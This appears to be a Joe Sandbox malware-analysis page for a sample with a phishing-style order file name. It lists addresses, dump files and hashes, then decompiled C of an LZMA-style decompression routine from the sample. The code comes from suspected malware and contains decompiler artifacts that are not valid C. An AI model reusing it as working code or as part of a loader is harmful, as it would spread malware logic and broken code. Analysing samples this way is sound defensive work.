0x00406d91
0x00000000
0x00406a71
0x00406a75
0x00000000
0x00406a7b
0x00406a7b
0x00406a7f
0x00000000
0x00406a85
0x00406a85
0x00406a87
0x00406a8e
0x00406a92
0x00406a95
0x00406a99
0x00406f5f
0x00000000
0x00406a9f
0x00406a9f
0x00406aa2
0x00406aa5
0x00406aa8
0x00406aaa
0x00406aaa
0x00406aaa
0x00406aad
0x00406ab0
0x00406ab3
0x00406ab6
0x00406ab9
0x00406abc
0x00406abd
0x00406abf
0x00406abf
0x00406abf
0x00406ac2
0x00406ac5
0x00406ac8
0x00406acb
0x00406acb
0x00406acb
0x00406ace
0x00000000
0x00406ace
0x00406a99
0x00406a7f
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b09
0x00406b0d
0x00406b14
0x00406b17
0x00406b1a
0x00406b0f
0x00406b0f
0x00406b0f
0x00406b1d
0x00406b20
0x00000000
0x00000000
0x00406bc9
0x00406bc9
0x00406bc9
0x00406bcd
0x00000000
0x00000000
0x00406bd3
0x00406bd6
0x00406bd9
0x00406bdd
0x00406be0
0x00406be6
0x00406be8
0x00406be8
0x00406be8
0x00406beb
0x00406bee
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf1
0x00406bf4
0x00406bf8
0x00000000
0x00000000
0x00406bfa
0x00406bfd
0x00406bff
0x00406c02
0x00406c05
0x00406c08
0x00406c0a
0x00406c0d
0x00406c10
0x00406c10
0x00406c13
0x00406c13
0x00406c16
0x00406c1d
0x00000000
0x00406c1f
0x00000000
0x00406c1f
0x00000000
0x00406c1d
0x00406c24
0x00406c26
0x00406c2d
0x00406c30
0x00406c33
0x00406c33
0x00406c38
0x00406c3a
0x00406c3d
0x00406c44
0x00406c47
0x00406c74
0x00406c74
0x00406c77
0x00406c7a
0x00000000
0x00000000
0x00406c7c
0x00406c82
0x00406c85
0x00406c88
0x00406c8b
0x00406c8e
0x00406c91
0x00406c94
0x00406c97
0x00406c9a
0x00406c9d
0x00406cb6
0x00406cb8
0x00406cbb
0x00406cbc
0x00406cbf
0x00406cc1
0x00406cc4
0x00406cc6
0x00406cc8
0x00406ccb
0x00406ccd
0x00406cd0
0x00406cd4
0x00406cd6
0x00406cd6
0x00406cd7
0x00406cda
0x00406cdd
0x00406c9f
0x00406c9f
0x00406ca7
0x00406cac
0x00406cae
0x00406cb1
0x00406cb1
0x00406ce0
0x00406ce7
0x00406c71
0x00406c71
0x00406c71
0x00406c71
0x00000000
0x00406ce9
0x00406c4c
0x00406c50
0x00406f77
0x00000000
0x00406c56
0x00406c56
0x00406c59
0x00406c5c
0x00406c60
0x00406c63
0x00406c69
0x00406c6b
0x00406c6b
0x00406c6b
0x00406c6e
0x00000000
0x00406c6e
0x00406c50
0x00000000
0x00406ce7
0x00406cee
0x00406cee
0x00406cee
0x00406cf1
0x00406cf1
0x00406cf1
0x00406cf4
0x00406cf7
0x00406cf9
0x00406f83
0x00000000
0x00406cff
0x00406cff
0x00406d02
0x00000000
0x00406d08
0x00406d08
0x00406d0c
0x00406d0f
0x00406d0f
0x00406d0f
0x00406d12
0x00406d12
0x00406d16
0x00000000
0x00000000
0x00406d1c
0x00406d1f
0x00406d22
0x00406d25
0x00406d27
0x00406d27
0x00406d27
0x00406d2a
0x00406d2d
0x00406d30
0x00406d33
0x00406d36
0x00406d39
0x00406d3a
0x00406d3c
0x00406d3c
0x00406d3c
0x00406d3f
0x00406d42
0x00406d45
0x00406d48
0x00406d4b
0x00406d4f
0x00406d51
0x00406d54
0x00000000
0x00406d56
0x00000000
0x00406d56
0x00000000
0x00406d54
0x00406f89
0x00000000
0x00406f89
0x00406d02
0x00000000
0x00406cf9
0x00406f6b
0x00000000
0x00000000
0x004067be
0x004067be
0x004067c2
0x00406f2f
0x00000000
0x004067c8
0x004067c8
0x004067cb
0x004067ce
0x004067d2
0x004067d5
0x004067db
0x004067dd
0x004067dd
0x004067dd
0x004067e0
0x004067e3
0x004067e3
0x004067e6
0x004067e9
0x0040689c
0x0040689c
0x004068a2
0x00000000
0x00000000
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068bf
0x004068c2
0x004068da
0x004068dd
0x004068e0
0x004068e3
0x004068e3
0x004068e6
0x004068ea
0x004068ec
0x004068c4
0x004068c4
0x004068cc
0x004068d1
0x004068d3
0x004068d5
0x004068d5
0x004068ef
0x004068f6
0x004068f9
0x00000000
0x004068fb
0x00406877
0x0040687b
0x00406f3b
0x00000000
0x00406881
0x00406881
0x00406884
0x00406887
0x0040688b
0x0040688e
0x00406894
0x00406896
0x00406896
0x00406896
0x00406899
0x00000000
0x00406899
0x0040687b
0x00000000
0x004068f9
0x00000000
0x004067ef
0x004067ef
0x004067f5
0x00406900
0x00406900
0x00406900
0x00406900
0x00406904
0x00406904
0x00406907
0x0040690a
0x0040690e
0x00406f53
0x00000000
0x00406914
0x00406914
0x00406917
0x0040691a
0x0040691d
0x00406920
0x00406923
0x00406926
0x00406928
0x0040692b
0x0040692e
0x00406931
0x00406933
0x00406933
0x00406933
0x00406ad0
0x00406ad0
0x00406ad3
0x00406ad3
0x00000000
0x00406ad3
0x004067fb
0x004067fb
0x004067fb
0x004067ff
0x00406802
0x00406805
0x00406808
0x0040680b
0x0040680c
0x0040680f
0x00406811
0x00406817
0x0040681a
0x0040681d
0x00406820
0x00406823
0x00406826
0x00406829
0x00406845
0x00406848
0x0040684b
0x0040684e
0x00406855
0x00406859
0x0040685b
0x0040685f
0x0040682b
0x0040682b
0x0040682f
0x00406837
0x0040683c
0x0040683e
0x00406840
0x00406840
0x00406862
0x00406869
0x0040686c
0x00000000
0x00406872
0x00000000
0x00406872
0x0040686c
0x004067f5
0x004067e9
0x00000000
0x00000000
0x004065b8
0x00406fc0
0x00406fc0
0x00406de2
0x00406de2
0x00406de6
0x00406f95
0x00406fab
0x00406fb3
0x00406fba
0x00406fbc
0x00406dec
0x00406df2
0x00406df9
0x00406e01
0x00406e04
0x00000000
0x00406e04
0x00406de6
0x00406fc3
0x00406fc7
0x00406fc7
0x00406d94
0x00406d91
0x00406d91
0x00406d91
0x00000000
0x00406d91

Memory Dump Source

Source File: 00000002.00000002.23339788860.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.23339766481.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339840163.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23339868673.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340031143.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340074688.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340113009.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340161078.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.23340206853.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Order_002376662-579588_Date 24082022.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
Instruction ID: 361238ff60de6b05a878e60f6b30513898442098bea6392746699c597b8ff52c
Opcode Fuzzy Hash: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
Instruction Fuzzy Hash: 53713371E00229DBDF28CF98C844BADBBB1FF44305F15846AE816BB280CB795996DF54

Uniqueness

Uniqueness Score: -1.00%

Function 00406A2E Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406A2E(void* __ebx) {
				unsigned short _t449;
				signed int _t450;
				void _t451;
				signed int _t452;
				signed int _t453;
				signed int _t484;
				signed int _t487;
				signed int _t508;
				signed int* _t525;
				void* _t532;

				L0:
				while(1) {
					L0:
					if( *(_t532 - 0x40) != 0) {
						 *(_t532 - 0x84) = 0xa;
						_t525 =  *(_t532 - 4) + 0x1b0 +  *(_t532 - 0x38) * 2;
					} else {
						 *((intOrPtr*)(__ebp - 0x84)) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *((intOrPtr*)(__ebp - 0x4c));
					}
					while(1) {
						L117:
						 *(_t532 - 0x54) = _t525;
						while(1) {
							L118:
							_t449 =  *_t525;
							_t508 = _t449 & 0x0000ffff;
							_t484 = ( *(_t532 - 0x10) >> 0xb) * _t508;
							if( *(_t532 - 0xc) >= _t484) {
								 *(_t532 - 0x10) =  *(_t532 - 0x10) - _t484;
								 *(_t532 - 0xc) =  *(_t532 - 0xc) - _t484;
								 *(_t532 - 0x40) = 1;
								_t450 = _t449 - (_t449 >> 5);
								 *_t525 = _t450;
							} else {
								 *(_t532 - 0x10) = _t484;
								 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
								 *_t525 = (0x800 - _t508 >> 5) + _t449;
							}
							L121:
							if( *(_t532 - 0x10) >= 0x1000000) {
								L124:
								_t451 =  *(_t532 - 0x84);
								 *(_t532 - 0x88) = _t451;
								while(1) {
									L1:
									_t452 =  *(_t532 - 0x88);
									if(_t452 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t452 * 4 +  &M00406FC8))) {
										case 0:
											if( *(_t532 - 0x6c) == 0) {
												goto L138;
											} else {
												 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
												 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
												_t452 =  *( *(_t532 - 0x70));
												if(_t452 > 0xe1) {
													goto L139;
												} else {
													_t456 = _t452 & 0x000000ff;
													_push(0x2d);
													asm("cdq");
													_pop(_t489);
													_push(9);
													_pop(_t490);
													_t528 = _t456 / _t489;
													_t458 = _t456 % _t489 & 0x000000ff;
													asm("cdq");
													_t523 = _t458 % _t490 & 0x000000ff;
													 *(_t532 - 0x3c) = _t523;
													 *(_t532 - 0x1c) = (1 << _t528) - 1;
													 *((intOrPtr*)(_t532 - 0x18)) = (1 << _t458 / _t490) - 1;
													_t531 = (0x300 << _t523 + _t528) + 0x736;
													if(0x600 ==  *((intOrPtr*)(_t532 - 0x78))) {
														L10:
														if(_t531 != 0) {
															do {
																_t531 = _t531 - 1;
																 *((short*)( *(_t532 - 4) + _t531 * 2)) = 0x400;
															} while (_t531 != 0);
														}
														 *(_t532 - 0x48) =  *(_t532 - 0x48) & 0x00000000;
														 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
														goto L15;
													} else {
														if( *(_t532 - 4) != 0) {
															GlobalFree( *(_t532 - 4));
														}
														_t452 = GlobalAlloc(0x40, 0x600); // executed
														 *(_t532 - 4) = _t452;
														if(_t452 == 0) {
															goto L139;
														} else {
															 *((intOrPtr*)(_t532 - 0x78)) = 0x600;
															goto L10;
														}
													}
												}
											}
											goto L140;
										case 1:
											L13:
											__eflags =  *(_t532 - 0x6c);
											if( *(_t532 - 0x6c) == 0) {
												 *(_t532 - 0x88) = 1;
												goto L138;
											} else {
												 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
												 *(_t532 - 0x40) =  *(_t532 - 0x40) | ( *( *(_t532 - 0x70)) & 0x000000ff) <<  *(_t532 - 0x48) << 0x00000003;
												 *(_t532 - 0x70) =  &(( *(_t532 - 0x70))[1]);
												_t45 = _t532 - 0x48;
												 *_t45 =  *(_t532 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t532 - 0x48) < 4) {
													goto L13;
												} else {
													_t464 =  *(_t532 - 0x40);
													if(_t464 ==  *(_t532 - 0x74)) {
														L20:
														 *(_t532 - 0x48) = 5;
														 *( *(_t532 - 8) +  *(_t532 - 0x74) - 1) =  *( *(_t532 - 8) +  *(_t532 - 0x74) - 1) & 0x00000000;
														goto L23;
													} else {
														 *(_t532 - 0x74) = _t464;
														if( *(_t532 - 8) != 0) {
															GlobalFree( *(_t532 - 8));
														}
														_t452 = GlobalAlloc(0x40,  *(_t532 - 0x40)); // executed
														 *(_t532 - 8) = _t452;
														if(_t452 == 0) {
															goto L139;
														} else {
															goto L20;
														}
													}
												}
											}
											goto L140;
										case 2:
											L24:
											_t471 =  *(_t532 - 0x60) &  *(_t532 - 0x1c);
											 *(_t532 - 0x84) = 6;
											 *(_t532 - 0x4c) = _t471;
											_t525 =  *(_t532 - 4) + (( *(_t532 - 0x38) << 4) + _t471) * 2;
											goto L117;
										case 3:
											L21:
											__eflags =  *(_t532 - 0x6c);
											if( *(_t532 - 0x6c) == 0) {
												 *(_t532 - 0x88) = 3;
												goto L138;
											} else {
												 *(_t532 - 0x6c) =  *(_t532 - 0x6c) - 1;
												_t67 = _t532 - 0x70;
												 *_t67 =  &(( *(_t532 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t532 - 0xc) =  *(_t532 - 0xc) << 0x00000008 |  *( *(_t532 - 0x70)) & 0x000000ff;
												L23:
												 *(_t532 - 0x48) =  *(_t532 - 0x48) - 1;
												if( *(_t532 - 0x48) != 0) {
													goto L21;
												} else {
													goto L24;
												}
											}
											goto L140;
										case 4:
											L118:
											_t449 =  *_t525;
											_t508 = _t449 & 0x0000ffff;
											_t484 = ( *(_t532 - 0x10) >> 0xb) * _t508;
											if( *(_t532 - 0xc) >= _t484) {
												 *(_t532 - 0x10) =  *(_t532 - 0x10) - _t484;
												 *(_t532 - 0xc) =  *(_t532 - 0xc) - _t484;
												 *(_t532 - 0x40) = 1;
												_t450 = _t449 - (_t449 >> 5);
												 *_t525 = _t450;
											} else {
												 *(_t532 - 0x10) = _t484;
												 *(_t532 - 0x40) =  *(_t532 - 0x40) & 0x00000000;
												 *_t525 = (0x800 - _t508 >> 5) + _t449;
											}
											goto L121;
										case 5:
											goto L122;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *((intOrPtr*)(__ebp - 0x84)) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L117;
											} else {
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													do {
														__eax =  *(__ebp - 0x58);
														__edx = __ebx + __ebx;
														__ecx =  *(__ebp - 0x10);
														__esi = __edx + __eax;
														__ecx =  *(__ebp - 0x10) >> 0xb;
														__ax =  *__esi;
														 *(__ebp - 0x54) = __esi;
														__edi = __ax & 0x0000ffff;
														__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
														__eflags =  *(__ebp - 0xc) - __ecx;
														if( *(__ebp - 0xc) >= __ecx) {
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
															__cx = __ax;
															_t217 = __edx + 1; // 0x1
															__ebx = _t217;
															__cx = __ax >> 5;
															__eflags = __eax;
															 *__esi = __ax;
														} else {
															 *(__ebp - 0x10) = __ecx;
															0x800 = 0x800 - __edi;
															0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
															__ebx = __ebx + __ebx;
															 *__esi = __cx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														 *(__ebp - 0x44) = __ebx;
														if( *(__ebp - 0x10) >= 0x1000000) {
															goto L59;
														} else {
															__eflags =  *(__ebp - 0x6c);
															if( *(__ebp - 0x6c) == 0) {
																 *((intOrPtr*)(__ebp - 0x88)) = 0xf;
																goto L138;
															} else {
																__ecx =  *(__ebp - 0x70);
																__eax =  *(__ebp - 0xc);
																 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
																__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
																 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
																 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																_t203 = __ebp - 0x70;
																 *_t203 =  *(__ebp - 0x70) + 1;
																__eflags =  *_t203;
																 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
																goto L59;
															}
														}
														goto L140;
														L59:
														__eflags = __ebx - 0x100;
													} while (__ebx < 0x100);
													goto L55;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											}
											goto L140;
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *((intOrPtr*)(__ebp - 0x80)) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L68;
											} else {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *((intOrPtr*)(__ebp - 0x84)) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L117:
													 *(_t532 - 0x54) = _t525;
													goto L118;
												}
											}
											L117:
											 *(_t532 - 0x54) = _t525;
											goto L118;
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L87;
											} else {
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L139;
												} else {
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 |  *(__ebp - 0x38) - 0x00000007 >= 0x00000000 = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
													 *(__ebp - 0x38) = ( *(__ebp - 0x38) - 7 >= 0) + ( *(__ebp - 0x38) - 7 >= 0) + 9;
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														 *((intOrPtr*)(__ebp - 0x88)) = 0x1b;
														goto L138;
													} else {
														__eax =  *(__ebp - 0x14);
														__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
														__eflags = __eax -  *(__ebp - 0x74);
														if(__eax >=  *(__ebp - 0x74)) {
															__eax = __eax +  *(__ebp - 0x74);
															__eflags = __eax;
														}
														__edx =  *(__ebp - 8);
														__cl =  *(__eax + __edx);
														__eax =  *(__ebp - 0x14);
														 *(__ebp - 0x5c) = __cl;
														 *(__eax + __edx) = __cl;
														__eax = __eax + 1;
														__edx = 0;
														_t274 = __eax %  *(__ebp - 0x74);
														__eax = __eax /  *(__ebp - 0x74);
														__edx = _t274;
														__eax =  *(__ebp - 0x68);
														 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
														 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
														_t283 = __ebp - 0x64;
														 *_t283 =  *(__ebp - 0x64) - 1;
														__eflags =  *_t283;
														 *( *(__ebp - 0x68)) = __cl;
														goto L77;
													}
												}
											}
											goto L140;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *((intOrPtr*)(__ebp - 0x84)) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												while(1) {
													L117:
													 *(_t532 - 0x54) = _t525;
													goto L118;
												}
											} else {
												__eax =  *(__ebp - 0x28);
												goto L86;
											}
											while(1) {
												L117:
												 *(_t532 - 0x54) = _t525;
												goto L118;
											}
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L86:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L87:
											__eax =  *(__ebp - 4);
											 *((intOrPtr*)(__ebp - 0x80)) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											L68:
											__esi =  *(__ebp - 0x58);
											 *((intOrPtr*)(__ebp - 0x84)) = 0x12;
											while(1) {
												L117:
												 *(_t532 - 0x54) = _t525;
												goto L118;
											}
										case 0xc:
											while(1) {
												L88:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													break;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t315 = __ebp - 0x70;
												 *_t315 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t315;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												while(1) {
													_t319 = __ebp - 0x48;
													 *_t319 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t319;
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														break;
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L88;
													}
													goto L140;
												}
												__eax = __eax + __ebx;
												 *(__ebp - 0x40) = 4;
												 *(__ebp - 0x2c) = __eax;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x644;
												__eflags = __eax;
												__ebx = 0;
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x44) = 0;
												 *(__ebp - 0x48) = 0;
												while(1) {
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														break;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L100:
														_t349 = __ebp - 0x48;
														 *_t349 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t349;
														continue;
													} else {
														__eflags =  *(__ebp - 0x6c);
														if( *(__ebp - 0x6c) == 0) {
															 *((intOrPtr*)(__ebp - 0x88)) = 0x10;
															goto L138;
														} else {
															__ecx =  *(__ebp - 0x70);
															__eax =  *(__ebp - 0xc);
															 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
															__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
															 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
															 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
															_t346 = __ebp - 0x70;
															 *_t346 =  *(__ebp - 0x70) + 1;
															__eflags =  *_t346;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
															goto L100;
														}
													}
													goto L140;
												}
												_t372 = __ebp - 0x2c;
												 *_t372 =  *(__ebp - 0x2c) + __ebx;
												__eflags =  *_t372;
												_t374 = __ebp - 0x2c;
												 *_t374 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t374;
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L138;
												} else {
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L139;
													} else {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
														__eax =  *(__ebp - 0x30);
														_t381 = __ebp - 0x60;
														 *_t381 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
														__eflags =  *_t381;
														while(1) {
															__eflags =  *(__ebp - 0x64);
															if( *(__ebp - 0x64) == 0) {
																break;
															}
															__eax =  *(__ebp - 0x14);
															__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
